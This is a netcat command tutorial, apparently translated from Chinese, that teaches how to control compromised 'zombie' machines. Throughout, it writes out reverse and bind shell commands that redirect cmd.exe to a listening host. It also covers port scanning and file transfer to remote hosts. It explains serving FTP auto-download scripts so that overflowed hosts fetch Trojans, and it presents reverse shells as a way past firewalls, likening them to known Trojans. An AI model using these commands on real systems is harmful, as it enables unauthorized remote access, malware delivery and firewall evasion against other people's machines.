[Command Explanation] Reverse connection. First run nc -l -p 2012 on the local host (Note: assuming its IP address is 192.168.1.102) to open port 2012 and listen for the remote host's connection; then run nc -t -e cmd.exe 192.168.1.102 2012 on the remote host to redirect its CMD to the host 192.168.1.102, port 2012. After the connection succeeds, the host 192.168.1.102 gets a CMD shell.
===========================================================================
[Local operation] nc -v -n ip port < C:/sunzn.exe
[Remote operation] nc -v -l -p port > D:/sunzn.exe
[Command Explanation] Running nc -v -n ip port < C:/sunzn.exe locally reads the file sunzn.exe from the root of the local C drive and sends it to the given port of the remote host (Note: the IP in the command is that of the remote host receiving the file). Running nc -v -l -p port > D:/sunzn.exe on the remote host listens on that port and writes the received data to D:/sunzn.exe. Together these two commands transfer a file between the local and remote hosts.
===========================================================================
[Local operation] nc -L -p 8989 < C:\ftp.txt (ftp.txt contains the FTP automatic download commands)
[Command Explanation] Keep listening on port 8989 and send the content of C:\ftp.txt to any host that connects to port 8989 of this machine, which can be used to transfer files (this usage is often used with reverse overflows: once an overflowed remote host connects to port 8989 of the local host, it automatically uses FTP to download the specified file, such as a Trojan horse).
===========================================================================

Simple usage tutorial:

Command 1: Listening command

  nc -l -p port
  nc -l -p port > e:\log.dat
  nc -l -v -p port

Parameter explanation:
-l: Listening port, listening for inbound information
-p: followed by the local port number
-v: Display port information. If -vv is used, more detailed information about the port will be displayed.

Tip: Generally everyone likes to use -vv

nc -l -p 80 //This is very simple, listening to port 80. If this command is run on the machine, port 80 is considered open and can fool the scanner.
nc -l -p 80 > e:\log.dat //Write detailed information to the log file log.dat on disk E
nc -l -v -p 80 //Similar to the above command, the information will be directly displayed on the screen running NC.

practice:

For example: nc -l -v -p 80

Then enter the local IP in the browser: 127.0.0.1

Command 2: Program redirection (the reverse shell method)

nc -l -p port -t -e cmd.exe

Local machine: nc -l -p port or nc -l -v -p port
Target machine: nc -e cmd.exe ip port

Parameter explanation:
The two parameters -l and -p have been explained.
-e: program redirection (the named program serves the connection)
-t: Reply in the form of telnet

example

nc -l -p 5277 -t -e cmd.exe  
 // Never run it on your own machine. If you do, your machine will become a TELNET server.

Command Explanation:

Listen for incoming information on local port 5277, and redirect the CMD.exe program to port 5277. When someone connects, let the CMD.exe program respond to the connection request in the form of TELNET. To put it simply, it actually makes it a TELNET zombie, so this command must be run on your zombie.

Example usage:

local machine: nc -l -p port ( or nc -l -v -p port )
Remote machine: nc -e cmd.exe ip port

Everyone knows Gray Pigeon and Thief, right? Both tools use the rebound port type Trojan.

What is a bounce port?

That is to say, when the other party is infected, you do not need to actively connect to the other party, that is, you do not need to send a connection request from your client to the server running on the other party's host. Instead, the other party will actively connect to you. This can make many firewalls ineffective because many firewalls do not check outbound requests.

When these two commands are combined here, they can be said to have the same effect as those two Trojans.

Local operation: nc -l -p 5277 (listen to local port 5277) or nc -l -v -p 5277

Then on the remote machine, try to run nc -e cmd.exe ip 5277

(Don’t literally type “ip” on the zombie machine; type the actual address, like xxx.xxx.xxx.xxx!)

This is the rebound: you get a SHELL on the local machine.

Command 3: Scan ports

nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port

Parameter explanation:

-z: Turn off input and output, used when scanning

nc -v ip port  

//This command is to scan a certain port

For example:

nc -v ip 135  
//Scan port 135 of the remote host to obtain some simple information about the port, but for some ports, we can also obtain more information

For example: port 80

nc -v ip 80 Then use the get method to obtain the other party's WEB server information

nc -v -z ip port-port  
 //This command is used to scan TCP ports quickly, and port-port specifies the port range to scan.

For example:

nc -v -z ip 1-200
//You can see the open status of TCP ports 1-200 on the machine

nc -v -z -u ip port-port
//This command has one more parameter, -u, than the previous one. It still scans ports, but -u makes it scan UDP ports

For example:

nc -v -z -u ip 1-200 //This command will scan UDP ports 1-200

Command 4: Transfer files (HOHO, I LIKE)

LOCAL MACHINE: nc -v -n ip port < x:\svr.exe
REMOTE MACHINE: nc -v -l -p port > y:\svr.exe

Parameter explanation:

-n: Specify a numeric IP address

These two commands are combined to transfer files

First, run the command on the remote machine:

nc -v -l -p 5277 > c:\pulist.exe

Do you remember this command? Haha, isn't it a bit similar to the monitoring command? Yes, that's right, this is monitoring port 5277

And write the received information data to c:\pulist.exe

Now run on the local machine

nc -v -n ip 5277 < e:\hack\pulist.exe

This command means reading the contents of the pulist.exe file from the local E drive and directory, and sending this data to port 5277 of the IP address.

This will automatically create a pulist.exe file on the remote host.
